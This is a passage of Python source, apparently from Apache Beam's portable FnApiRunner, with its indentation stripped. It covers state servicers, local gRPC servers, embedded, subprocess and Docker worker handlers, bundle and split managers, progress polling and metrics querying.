context, pipeline_components, stage, get_buffer, deferred_inputs)
# Queue any process-initiated delayed bundle applications.
for delayed_application in last_result.process_bundle.residual_roots:
deferred_inputs[
input_for(
delayed_application.application.transform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
# Queue any runner-initiated delayed bundle applications.
self._add_residuals_and_channel_splits_to_deferred_inputs(
splits, get_input_coder_impl, input_for, last_sent, deferred_inputs)
if deferred_inputs:
# The worker will be waiting on these inputs as well.
for other_input in data_input:
if other_input not in deferred_inputs:
deferred_inputs[other_input] = _ListBuffer([])
# TODO(robertwb): merge results
# We cannot split deferred_input until we include residual_roots to
# merged results. Without residual_roots, pipeline stops earlier and we
# may miss some data.
bundle_manager._num_workers = 1
bundle_manager._skip_registration = True
last_result, splits = bundle_manager.process_bundle(
deferred_inputs, data_output)
last_sent = deferred_inputs
result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
last_result.process_bundle.monitoring_infos))),
error=result.error or last_result.error)
else:
break
return result
@staticmethod
def _extract_endpoints(stage,
pipeline_components,
data_api_service_descriptor,
pcoll_buffers):
"""Returns maps of transform names to PCollection identifiers.
Also mutates IO stages to point to the data ApiServiceDescriptor.
Args:
stage (fn_api_runner_transforms.Stage): The stage to extract endpoints
for.
pipeline_components (beam_runner_api_pb2.Components): Components of the
pipeline to include coders, transforms, PCollections, etc.
data_api_service_descriptor: A GRPC endpoint descriptor for data plane.
pcoll_buffers (dict): A dictionary containing buffers for PCollection
elements.
Returns:
A tuple of (data_input, data_side_input, data_output) dictionaries.
`data_input` is a dictionary mapping (transform_name, output_name) to a
PCollection buffer; `data_output` is a dictionary mapping
(transform_name, output_name) to a PCollection ID.
"""
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[transform.unique_name] = _ListBuffer(
[ENCODED_IMPULSE_VALUE])
else:
data_input[transform.unique_name] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
data_output[transform.unique_name] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
# These classes are used to interact with the worker.
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
class CopyOnWriteState(object):
def __init__(self, underlying):
self._underlying = underlying
self._overlay = {}
def __getitem__(self, key):
if key in self._overlay:
return self._overlay[key]
else:
return FnApiRunner.StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
self._overlay[key] = []
def commit(self):
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self, underlying, overlay, key):
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
def __init__(self):
self._lock = threading.Lock()
self._state = collections.defaultdict(list)
self._checkpoint = None
self._use_continuation_tokens = False
self._continuations = {}
def checkpoint(self):
assert self._checkpoint is None
self._checkpoint = self._state
self._state = FnApiRunner.StateServicer.CopyOnWriteState(self._state)
def commit(self):
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
self._state = self._checkpoint
self._checkpoint = None
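    # checkpoint()/restore() wrap the current state in a copy-on-write overlay
    # so that repeated bundle executions (see
    # _run_bundle_multiple_times_for_testing) can be replayed without the
    # extra runs mutating the committed state; commit() folds the overlay back.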
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
yield
def get_raw(self, state_key, continuation_token=None):
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = 'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', '%s:0' % token_base
else:
token_base, index = continuation_token.split(':')
ix = int(index)
full_state = self._continuations[token_base]
if ix == len(full_state):
return b'', None
else:
return full_state[ix], '%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
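    # Continuation-token protocol (when _use_continuation_tokens is True): the
    # first get_raw() call returns (b'', 'token_<n>:0'); each follow-up call
    # with the returned token yields one stored chunk plus the next token, and
    # (b'', None) signals that all chunks have been delivered.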
def append_raw(self, state_key, data):
with self._lock:
self._state[self._to_key(state_key)].append(data)
return _Future.done()
def clear(self, state_key):
with self._lock:
try:
del self._state[self._to_key(state_key)]
except KeyError:
# This may happen with the caching layer across bundles. Caching may
# skip this storage layer for a blocking_get(key) request. Without
# the caching, the state for a key would be initialized via the
# defaultdict that _state uses.
pass
return _Future.done()
@staticmethod
def _to_key(state_key):
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
self._state = state
def State(self, request_stream, context=None):
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_id.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.get_raw(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.append_raw(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
"""Does nothing."""
pass
@staticmethod
def get_cache_token_generator(static=True):
"""A generator for cache tokens.
    :arg static: If True, the generator always returns the same cache token;
                 if False, it returns a new cache token on each next() call.
    :return: A generator which returns a cache token on next(generator).
"""
def generate_token(identifier):
return beam_fn_api_pb2.ProcessBundleRequest.CacheToken(
user_state=beam_fn_api_pb2
.ProcessBundleRequest.CacheToken.UserState(),
token="cache_token_{}".format(identifier).encode("utf-8"))
class StaticGenerator(object):
def __init__(self):
self._token = generate_token(1)
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
return self._token
class DynamicGenerator(object):
def __init__(self):
self._counter = 0
self._lock = threading.Lock()
def __iter__(self):
# pylint: disable=non-iterator-returned
return self
def __next__(self):
with self._lock:
self._counter += 1
return generate_token(self._counter)
return StaticGenerator() if static else DynamicGenerator()
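  # Usage sketch: the returned object is consumed with next(), e.g.
  #   gen = FnApiRunner.get_cache_token_generator(static=False)
  #   token = next(gen)  # a fresh ProcessBundleRequest.CacheToken each call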
class WorkerHandler(object):
"""worker_handler for a worker.
It provides utilities to start / stop the worker, provision any resources for
it, as well as provide descriptors for the data, state and logging APIs for
it.
"""
_registered_environments = {}
_worker_id_counter = -1
_lock = threading.Lock()
def __init__(
self, control_handler, data_plane_handler, state, provision_info):
"""Initialize a WorkerHandler.
Args:
control_handler:
data_plane_handler (data_plane.DataChannel):
state:
provision_info:
"""
self.control_handler = control_handler
self.data_plane_handler = data_plane_handler
self.state = state
self.provision_info = provision_info
with WorkerHandler._lock:
WorkerHandler._worker_id_counter += 1
self.worker_id = 'worker_%s' % WorkerHandler._worker_id_counter
def close(self):
self.stop_worker()
def start_worker(self):
raise NotImplementedError
def stop_worker(self):
raise NotImplementedError
def data_api_service_descriptor(self):
raise NotImplementedError
def state_api_service_descriptor(self):
raise NotImplementedError
def logging_api_service_descriptor(self):
raise NotImplementedError
@classmethod
def register_environment(cls, urn, payload_type):
def wrapper(constructor):
cls._registered_environments[urn] = constructor, payload_type
return constructor
return wrapper
@classmethod
def create(cls, environment, state, provision_info, grpc_server):
constructor, payload_type = cls._registered_environments[environment.urn]
return constructor(
proto_utils.parse_Bytes(environment.payload, payload_type),
state,
provision_info,
grpc_server)
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON, None)
class EmbeddedWorkerHandler(WorkerHandler):
"""An in-memory worker_handler for fn API control, state and data planes."""
def __init__(self, unused_payload, state, provision_info,
unused_grpc_server=None):
super(EmbeddedWorkerHandler, self).__init__(
self, data_plane.InMemoryDataChannel(), state, provision_info)
self.control_conn = self
self.data_conn = self.data_plane_handler
state_cache = StateCache(STATE_CACHE_SIZE)
self.worker = sdk_worker.SdkWorker(
sdk_worker.BundleProcessorCache(
FnApiRunner.SingletonStateHandlerFactory(
sdk_worker.CachingStateHandler(state_cache, state)),
data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()),
{}), state_cache_metrics_fn=state_cache.get_monitoring_infos)
self._uid_counter = 0
def push(self, request):
if not request.instruction_id:
self._uid_counter += 1
request.instruction_id = 'control_%s' % self._uid_counter
response = self.worker.do_instruction(request)
return ControlFuture(request.instruction_id, response)
def start_worker(self):
pass
def stop_worker(self):
self.worker.stop()
def done(self):
pass
def data_api_service_descriptor(self):
return None
def state_api_service_descriptor(self):
return None
def logging_api_service_descriptor(self):
return None
class BasicLoggingService(beam_fn_api_pb2_grpc.BeamFnLoggingServicer):
LOG_LEVEL_MAP = {
beam_fn_api_pb2.LogEntry.Severity.CRITICAL: logging.CRITICAL,
beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(
beam_provision_api_pb2_grpc.ProvisionServiceServicer):
def __init__(self, info):
self._info = info
def GetProvisionInfo(self, request, context=None):
return beam_provision_api_pb2.GetProvisionInfoResponse(
info=self._info)
class EmptyArtifactRetrievalService(
beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer):
def GetManifest(self, request, context=None):
return beam_artifact_api_pb2.GetManifestResponse(
manifest=beam_artifact_api_pb2.Manifest())
def GetArtifact(self, request, context=None):
raise ValueError('No artifacts staged.')
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self, state, provision_info):
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(UnboundedThreadPoolExecutor())
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
UnboundedThreadPoolExecutor(),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
UnboundedThreadPoolExecutor(),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
provision_info = self.provision_info.provision_info
if not provision_info.worker_id:
provision_info = copy.copy(provision_info)
provision_info.worker_id = str(uuid.uuid4())
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(self.provision_info.provision_info),
self.control_server)
if self.provision_info.artifact_staging_dir:
service = artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir)
else:
service = EmptyArtifactRetrievalService()
beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
service, self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
FnApiRunner.GrpcStateServicer(state),
self.state_server)
self.logging_server = grpc.server(
UnboundedThreadPoolExecutor(),
options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(),
self.logging_server)
_LOGGER.info('starting control server on port %s', self.control_port)
_LOGGER.info('starting data server on port %s', self.data_port)
_LOGGER.info('starting state server on port %s', self.state_port)
_LOGGER.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self, state, provision_info, grpc_server):
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler, self._grpc_server.data_plane_handler,
state, provision_info)
self.state = state
self.control_address = self.port_from_worker(self._grpc_server.control_port)
self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id(
self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id(
self.worker_id)
def data_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.data_port))
def state_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.state_port))
def logging_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.logging_port))
def close(self):
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
def port_from_worker(self, port):
return '%s:%s' % (self.host_from_worker(), port)
def host_from_worker(self):
return 'localhost'
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self, external_payload, state, provision_info, grpc_server):
super(ExternalWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._external_payload = external_payload
def start_worker(self):
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
response = stub.StartWorker(
beam_fn_api_pb2.StartWorkerRequest(
worker_id=self.worker_id,
control_endpoint=endpoints_pb2.ApiServiceDescriptor(
url=self.control_address),
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
pass
def host_from_worker(self):
import socket
return socket.getfqdn()
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info, grpc_server):
super(EmbeddedGrpcWorkerHandler, self).__init__(state, provision_info,
grpc_server)
if payload:
state_cache_size = payload.decode('ascii')
self._state_cache_size = int(state_cache_size)
else:
self._state_cache_size = STATE_CACHE_SIZE
def start_worker(self):
self.worker = sdk_worker.SdkHarness(
self.control_address, state_cache_size=self._state_cache_size,
worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
# The subprocess module is not thread-safe on Python 2.7. Use this lock to
# prevent concurrent calls to Popen().
SUBPROCESS_LOCK = threading.Lock()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, worker_command_line, state, provision_info, grpc_server):
super(SubprocessSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address, self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(common_urns.environments.DOCKER.urn,
beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info, grpc_server):
super(DockerSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._container_image = payload.container_image
self._container_id = None
def host_from_worker(self):
if sys.platform == "darwin":
# See https://docs.docker.com/docker-for-mac/networking/
return 'host.docker.internal'
else:
return super(DockerSdkWorkerHandler, self).host_from_worker()
def start_worker(self):
with SUBPROCESS_LOCK:
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
_LOGGER.info('Unable to pull image %s' % self._container_image)
self._container_id = subprocess.check_output(
['docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % self.worker_id,
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
while True:
status = subprocess.check_output([
'docker',
'inspect',
'-f',
'{{.State.Status}}',
self._container_id]).strip()
        _LOGGER.info('Waiting for docker to start up. Current status is %s' %
                     status)
if status == b'running':
_LOGGER.info('Docker container is running. container_id = %s, '
'worker_id = %s', self._container_id, self.worker_id)
break
elif status in (b'dead', b'exited'):
subprocess.call([
'docker',
'container',
'logs',
self._container_id])
raise RuntimeError('SDK failed to start. Final status is %s' % status)
time.sleep(1)
def stop_worker(self):
if self._container_id:
with SUBPROCESS_LOCK:
subprocess.call([
'docker',
'kill',
self._container_id])
class WorkerHandlerManager(object):
def __init__(self, environments, job_provision_info):
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(list)
self._state = FnApiRunner.StateServicer() # rename?
self._grpc_server = None
def get_worker_handlers(self, environment_id, num_workers):
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
# assume all environments except EMBEDDED_PYTHON use gRPC.
if environment.urn == python_urns.EMBEDDED_PYTHON:
pass # no need for a gRPC server
elif self._grpc_server is None:
self._grpc_server = GrpcServer(self._state, self._job_provision_info)
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment, self._state, self._job_provision_info,
self._grpc_server)
_LOGGER.info("Created Worker handler %s for environment %s",
worker_handler, environment)
self._cached_handlers[environment_id].append(worker_handler)
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
_LOGGER.error("Error closing worker_handler %s" % worker_handler,
exc_info=True)
self._cached_handlers = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
class ExtendedProvisionInfo(object):
def __init__(self, provision_info=None, artifact_staging_dir=None):
self.provision_info = (
provision_info or beam_provision_api_pb2.ProvisionInfo())
self.artifact_staging_dir = artifact_staging_dir
_split_managers = []
@contextlib.contextmanager
def split_manager(stage_name, split_manager):
"""Registers a split manager to control the flow of elements to a given stage.
Used for testing.
A split manager should be a coroutine yielding desired split fractions,
receiving the corresponding split results. Currently, only one input is
supported.
"""
try:
_split_managers.append((stage_name, split_manager))
yield
finally:
_split_managers.pop()
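# A hedged example of a split manager coroutine (test-only; the stage name
# 'MyStage' is hypothetical): it asks once for a split of half the remaining
# elements and ignores the reported result.
#
#   def halve_once(num_elements):
#     _ = yield 0.5  # receives the corresponding split result
#
#   with split_manager('MyStage', halve_once):
#     ...  # run the pipeline under test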
class BundleManager(object):
"""Manages the execution of a bundle from the runner-side.
This class receives a bundle descriptor, and performs the following tasks:
- Registration of the bundle with the worker.
- Splitting of the bundle
- Setting up any other bundle requirements (e.g. side inputs).
- Submitting the bundle to worker for execution
- Passing bundle input data to the worker
- Collecting bundle output data from the worker
- Finalizing the bundle.
"""
_uid_counter = 0
_lock = threading.Lock()
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False,
cache_token_generator=FnApiRunner.get_cache_token_generator()):
"""Set up a bundle manager.
Args:
worker_handler_list
get_buffer (Callable[[str], list])
get_input_coder_impl (Callable[[str], Coder])
bundle_descriptor (beam_fn_api_pb2.ProcessBundleDescriptor)
progress_frequency
skip_registration
"""
self._worker_handler_list = worker_handler_list
self._get_buffer = get_buffer
self._get_input_coder_impl = get_input_coder_impl
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
self._worker_handler = None
self._cache_token_generator = cache_token_generator
def _send_input_to_worker(self,
process_bundle_id,
read_transform_id,
byte_streams):
data_out = self._worker_handler.data_conn.output_stream(
process_bundle_id, read_transform_id)
for byte_stream in byte_streams:
data_out.write(byte_stream)
data_out.close()
def _register_bundle_descriptor(self):
if self._registered:
registration_future = None
else:
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
registration_future = self._worker_handler.control_conn.push(
process_bundle_registration)
self._registered = True
return registration_future
def _select_split_manager(self):
"""TODO(pabloem) WHAT DOES THIS DO"""
unique_names = set(
t.unique_name for t in self._bundle_descriptor.transforms.values())
for stage_name, candidate in reversed(_split_managers):
if (stage_name in unique_names
or (stage_name + '/Process') in unique_names):
split_manager = candidate
break
else:
split_manager = None
return split_manager
def _generate_splits_for_testing(self,
split_manager,
inputs,
process_bundle_id):
split_results = []
read_transform_id, buffer_data = only_element(inputs.items())
byte_stream = b''.join(buffer_data)
num_elements = len(list(
self._get_input_coder_impl(read_transform_id).decode_all(byte_stream)))
# Start the split manager in case it wants to set any breakpoints.
split_manager_generator = split_manager(num_elements)
try:
split_fraction = next(split_manager_generator)
done = False
except StopIteration:
done = True
# Send all the data.
self._send_input_to_worker(
process_bundle_id, read_transform_id, [byte_stream])
# Execute the requested splits.
while not done:
if split_fraction is None:
split_result = None
else:
split_request = beam_fn_api_pb2.InstructionRequest(
process_bundle_split=
beam_fn_api_pb2.ProcessBundleSplitRequest(
instruction_id=process_bundle_id,
desired_splits={
read_transform_id:
beam_fn_api_pb2.ProcessBundleSplitRequest.DesiredSplit(
fraction_of_remainder=split_fraction,
estimated_input_elements=num_elements)
}))
split_response = self._worker_handler.control_conn.push(
split_request).get()
for t in (0.05, 0.1, 0.2):
waiting = ('Instruction not running', 'not yet scheduled')
if any(msg in split_response.error for msg in waiting):
time.sleep(t)
split_response = self._worker_handler.control_conn.push(
split_request).get()
if 'Unknown process bundle' in split_response.error:
# It may have finished too fast.
split_result = None
elif split_response.error:
raise RuntimeError(split_response.error)
else:
split_result = split_response.process_bundle_split
split_results.append(split_result)
try:
split_fraction = split_manager_generator.send(split_result)
except StopIteration:
break
return split_results
def process_bundle(self, inputs, expected_outputs):
# Unique id for the instruction processing this bundle.
with BundleManager._lock:
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
self._worker_handler = self._worker_handler_list[
BundleManager._uid_counter % len(self._worker_handler_list)]
# Register the bundle descriptor, if needed - noop if already registered.
registration_future = self._register_bundle_descriptor()
# Check that the bundle was successfully registered.
if registration_future and registration_future.get().error:
raise RuntimeError(registration_future.get().error)
split_manager = self._select_split_manager()
if not split_manager:
# If there is no split_manager, write all input data to the channel.
for transform_id, elements in inputs.items():
self._send_input_to_worker(
process_bundle_id, transform_id, elements)
# Actually start the bundle.
process_bundle_req = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_id=self._bundle_descriptor.id,
cache_tokens=[next(self._cache_token_generator)]))
result_future = self._worker_handler.control_conn.push(process_bundle_req)
split_results = []
with ProgressRequester(
self._worker_handler, process_bundle_id, self._progress_frequency):
if split_manager:
split_results = self._generate_splits_for_testing(
split_manager, inputs, process_bundle_id)
# Gather all output data.
for output in self._worker_handler.data_conn.input_elements(
process_bundle_id,
expected_outputs.keys(),
abort_callback=lambda: (result_future.is_done()
and result_future.get().error)):
if output.transform_id in expected_outputs:
with BundleManager._lock:
self._get_buffer(
expected_outputs[output.transform_id]).append(output.data)
_LOGGER.debug('Wait for the bundle %s to finish.' % process_bundle_id)
result = result_future.get()
if result.error:
raise RuntimeError(result.error)
if result.process_bundle.requires_finalization:
finalize_request = beam_fn_api_pb2.InstructionRequest(
finalize_bundle=
beam_fn_api_pb2.FinalizeBundleRequest(
instruction_id=process_bundle_id
))
self._worker_handler.control_conn.push(finalize_request)
return result, split_results
class ParallelBundleManager(BundleManager):
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False,
cache_token_generator=None, **kwargs):
super(ParallelBundleManager, self).__init__(
worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency, skip_registration,
cache_token_generator=cache_token_generator)
self._num_workers = kwargs.pop('num_workers', 1)
def process_bundle(self, inputs, expected_outputs):
part_inputs = [{} for _ in range(self._num_workers)]
for name, input in inputs.items():
for ix, part in enumerate(input.partition(self._num_workers)):
part_inputs[ix][name] = part
merged_result = None
split_result_list = []
with UnboundedThreadPoolExecutor() as executor:
for result, split_result in executor.map(lambda part: BundleManager(
self._worker_handler_list, self._get_buffer,
self._get_input_coder_impl, self._bundle_descriptor,
self._progress_frequency, self._registered,
cache_token_generator=self._cache_token_generator).process_bundle(
part, expected_outputs), part_inputs):
split_result_list += split_result
if merged_result is None:
merged_result = result
else:
merged_result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
merged_result.process_bundle.monitoring_infos))),
error=result.error or merged_result.error)
return merged_result, split_result_list
class ProgressRequester(threading.Thread):
""" Thread that asks SDK Worker for progress reports with a certain frequency.
A callback can be passed to call with progress updates.
"""
def __init__(self, worker_handler, instruction_id, frequency, callback=None):
super(ProgressRequester, self).__init__()
self._worker_handler = worker_handler
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._worker_handler.control_conn.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=
beam_fn_api_pb2.ProcessBundleProgressRequest(
instruction_id=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
_LOGGER.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
class FnApiMetrics(metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
user_metrics_only: If true, includes user metrics only.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._monitoring_infos = step_monitoring_infos
for smi in step_monitoring_infos.values():
counters, distributions, gauges = \
portable_metrics.from_monitoring_infos(smi, user_metrics_only)
self._counters.update(counters)
self._distributions.update(distributions)
self._gauges.update(gauges)
def query(self, filter=None):
counters = [MetricResult(k, v, v)
for k, v in self._counters.items()
if self.matches(filter, k)]
distributions = [MetricResult(k, v, v)
for k, v in self._distributions.items()
if self.matches(filter, k)]
gauges = [MetricResult(k, v, v)
for k, v in self._gauges.items()
if self.matches(filter, k)]
return {self.COUNTERS: counters,
